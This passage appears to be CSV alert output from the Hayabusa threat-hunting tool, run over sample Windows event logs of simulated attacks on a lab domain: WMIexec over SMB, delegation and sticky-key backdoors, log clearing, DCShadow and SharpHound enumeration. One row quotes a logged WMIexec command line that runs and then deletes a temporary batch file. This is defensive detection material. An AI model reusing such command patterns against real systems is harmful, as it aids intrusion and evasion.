admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.420 
+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: 
admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User 
Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any 
protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx -2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID1-WMIexec process execution.evtx -2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47450 : LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34544 : LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 45246 : LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" -2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" -2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig 
: Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: 
\\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : 
Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : 
Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: 
null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: 
\??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.916 
